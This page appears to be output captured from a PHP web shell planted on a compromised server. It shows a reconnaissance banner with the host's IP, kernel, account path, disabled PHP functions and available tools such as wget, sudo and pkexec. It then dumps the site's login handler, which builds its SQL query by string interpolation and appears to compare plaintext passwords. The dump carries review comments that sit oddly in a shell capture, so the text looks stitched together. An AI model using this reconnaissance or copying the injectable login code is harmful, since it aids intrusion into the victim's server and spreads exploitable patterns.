X3ND1 GANTENG
Server IP : 108.163.255.210  /  Your IP : 52.15.71.146
Web Server : Apache
System : Linux blossom.urlnameserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User :  ( 1172)
PHP Version : 7.2.34
Disable Function : eval,escapeshellarg,proc_close,proc_get_status,proc_nice,proc_open,symlink,system,pcntl_exec,getrusage,chown,chgp,closelog,openlog,syslog,define_syslog_variables,php_ini_loaded_file,getservbyname,getservbyport,posix_getgid,posix_getgrgid,proc_terminate,pfsockopen,apache_child_terminate,posix_mkfifo,posix_setpgid,posix_setuid,hypot,pg_host,pos,posix_access,posix_getcwd,posix_getservbyname,myshellexec,getpid,posix_getsid,posix_isatty,posix_kill,posix_mknod,posix_setgid,posix_setsid,posix_setuid,posix_times,posix_uname,ps_fill,posix_getpwuid,global,ini_restore,zip_open,zip_read,rar_open,bzopen,bzread,bzwrite,apache_get_modules,apache_get_version,phpversionphpinfo,php_ini_scanned_files,get_current_user,disk_total_space,diskfreespace,leak,imap_list,hypo,filedump,safe_mode,getmygid,apache_getenv,apache_setenv,bzread,bzwrite,bzopen,phpini,higlight_file,dos_conv,get_cwd,er_log,cmd,e_name,vdir,get_dir,only_read,ftok,ftpexec,posix_getpwnam,mysql_list_dbs,disk_free_space,session_save_path,confirm_phpdoc_compiled,zip_entry_rea,php_u,psockopen,crack_opendict,crack_getlastmessage,crack_closedict,crack_check,fpassthru,posix_get_last_error,posix_getlogin,posix_getgroups,posix_strerror,posix_getrlimit,posix_getpgrp,posix_getgrnam,pos,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/unilinki/www/Intellilead/includes/


Current File : /home/unilinki/www/Intellilead/includes/validate.php
<?php
require_once "../includes/application_top.php";
/**if(isset($_POST['user'])){
	if(empty($_SESSION['captcha_code'] ) || strcasecmp($_SESSION['captcha_code'], $_POST['captcha_code']) != 0){  
		$_SESSION['msg']="The Validation code does not match!";	
		header("Location: ../index.php");
		exit;
	}
}**/
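// Login handler: checks the posted credentials against mstr_user, and on
// success populates the session, sets the "remember me" cookie, resolves the
// menu/action privileges and redirects to the dashboard. Every failure path
// stores a message in $_SESSION['msg'] and redirects to ../index.php.

$rawUser = isset($_POST['user']) ? $_POST['user'] : null;
$rawPassword = isset($_POST['password']) ? $_POST['password'] : null;

// Missing or non-string (e.g. array-valued) fields are rejected up front so
// they never reach the SQL text or setcookie().
if (!is_string($rawUser) || !is_string($rawPassword)) {
	$_SESSION['msg'] = "Invalid Administrator ID or Password";
	header("Location: ../index.php");
	exit;
}

$user_name = checkInput($rawUser);
$pass = checkInput($rawPassword);

// NOTE(review): this query is built by string interpolation. Whether
// checkInput() escapes for SQL is not visible in this file -- confirm it does,
// and plan a move to prepared statements (PDO/mysqli); the mysql_* API used
// here has none.
// NOTE(review): the WHERE clause compares the submitted password with the
// `pass` column directly, which suggests that column holds a directly
// comparable (possibly plaintext) value -- verify against the schema.
$sql = "select * from mstr_user where user_name='$user_name' AND pass='$pass' AND status='Active'";
$result = executeQuery($sql);
$line = $result ? mysql_fetch_array($result) : false;

if (!$line || !isValid_password($pass, $line['password'])) {
	$_SESSION['msg'] = "Invalid Administrator ID or Password";
	header("Location: ../index.php");
	exit;
}

// Same test as before: any non-empty company_id, or the literal '0'.
$hasCompany = !empty($line['company_id']) || $line['company_id'] == '0';

if ($hasCompany) {
	mysql_query("UPDATE mstr_user set last_login=NOW(),login_ip='" . $_SERVER['REMOTE_ADDR'] . "' WHERE user_name='$user_name' AND pass='$pass'");

	// company_id comes from the database row; escape it before reuse in SQL.
	$companyId = mysql_real_escape_string($line['company_id']);
	$Status = getSingleColumn("SELECT status FROM mstr_company where company_id='" . $companyId . "'");

	// The company check now runs BEFORE the session is populated, so a user of
	// an inactive company no longer keeps role/privilege values in the session
	// (previously only user_id was removed after everything had been set).
	if (isset($Status[0]) && $Status[0] == 'Inactive') {
		unset($_SESSION['user_id']);
		$_SESSION['msg'] = "Record Not Found in Database";
		header("Location: ../index.php");
		exit;
	}
}

// Issue a fresh session id at the privilege change so an id that existed
// before login cannot be reused afterwards (session fixation).
if (session_id() !== '') {
	session_regenerate_id(true);
}

// Columns copied one-to-one from the user row into the session.
$sessionColumns = array(
	'company_id', 'user_name', 'name', 'user_id', 'role_id', 'rep_head',
	'user_type', 'email_id', 'client_id', 'company_name', 'phone_no',
	'contact_no', 'image', 'privilege', 'action',
);
foreach ($sessionColumns as $column) {
	$_SESSION[$column] = $line[$column];
}
// NOTE(review): the `pass` column value is kept in the session because other
// pages may read $_SESSION['password']; remove it once no consumer remains.
$_SESSION['password'] = $line['pass'];
$_SESSION['image_path'] = "user/";

// "Remember me": only the login name is remembered. The password is no longer
// written to a cookie (it used to be stored client-side in clear text for ten
// years), and any such cookie left over from an earlier login is cleared.
if (isset($_COOKIE["member_password"])) {
	setcookie("member_password", "");
}
if (!empty($_POST["remember"])) {
	// Empty path/domain keep PHP's defaults; the last argument sets HttpOnly.
	// NOTE(review): also set the Secure flag once the site is HTTPS-only.
	setcookie("member_login", $rawUser, time() + (10 * 365 * 24 * 60 * 60), '', '', false, true);
} else if (isset($_COOKIE["member_login"])) {
	setcookie("member_login", "");
}

// Built-in user types get fixed menu/action sets; any other user with a
// role_id gets the sets stored for that role; otherwise the row's own
// privilege/action values copied above stay in place.
switch ($line['user_type']) {
	case "0":
		$_SESSION['privilege'] = "1,2,3";
		$_SESSION['action'] = "1,2,3,4";
		break;
	case "1":
		$_SESSION['privilege'] = "31";
		$_SESSION['action'] = "1,2,3,4";
		break;
	case "2":
		$_SESSION['privilege'] = "33";
		$_SESSION['action'] = "1,2,4";
		break;
	default:
		if (isset($line['role_id'])) {
			// role_id comes from the database row; escape it before reuse in SQL.
			$role = mysql_real_escape_string($line['role_id']);
			$_SESSION['privilege'] = implode(',', getSingleColumn("SELECT role_permission FROM mstr_role where role_id='$role'"));
			$_SESSION['action'] = implode(',', getSingleColumn("SELECT role_action FROM mstr_role where role_id='$role'"));
		}
		break;
}

if ($hasCompany) {
	header("Location: ../template/dashboard.php");
	exit;
}
// NOTE(review): a user row without a company_id ends here, logged in but with
// no redirect; this matches the previous behaviour -- confirm it is intended.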
?>
